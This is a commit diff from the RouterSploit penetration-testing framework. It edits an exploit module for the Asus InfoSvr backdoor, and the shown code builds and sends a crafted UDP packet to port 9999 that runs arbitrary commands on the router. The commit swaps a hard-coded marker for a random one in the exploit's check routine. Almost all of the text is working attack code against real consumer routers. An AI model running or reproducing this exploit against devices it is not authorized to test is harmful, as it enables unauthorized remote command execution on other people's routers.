Adding check random value to Asus InfoSvr Backdoor exploit

185870f1 · Marcin Bury · 0bb49931 · 185870f1
Commit 185870f1 authored Oct 30, 2016 by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 5 additions and 5 deletions

infosvr_backdoor_rce.py routersploit/modules/exploits/asus/infosvr_backdoor_rce.py +5 -5

No files found.
--- a/routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
+++ b/routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
@@ -9,6 +9,7 @@ from routersploit import (
    print_error,
    mute,
    shell,
+    random_text,
 )
@@ -66,13 +67,13 @@ class Exploit(exploits.Exploit):
            print_error('Your command must be at most 237 characters long. Longer strings might crash the server.')
            return
+        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.bind(('0.0.0.0', 9999))
            sock.settimeout(2)
            packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
-        try:
            sock.sendto(packet, (self.target, 9999))
        except socket.error:
            return ""
@@ -92,11 +93,10 @@ class Exploit(exploits.Exploit):
    @mute
    def check(self):
-        NUM_CHECKS = 5  # we try 5 times because the exploit, tends to be unstable
+        NUM_CHECKS = 5  # we try 5 times because the exploit tends to be unstable
-        for i in xrange(NUM_CHECKS):
+        for _ in range(NUM_CHECKS):
-            # maybe random mark should be implemented
+            random_value = random_text(32)
-            random_value = "116b8df6aee055a05032ed26726c032914dc5dae"
            cmd = "echo {}".format(random_value)
            try:
                retval = self.execute(cmd)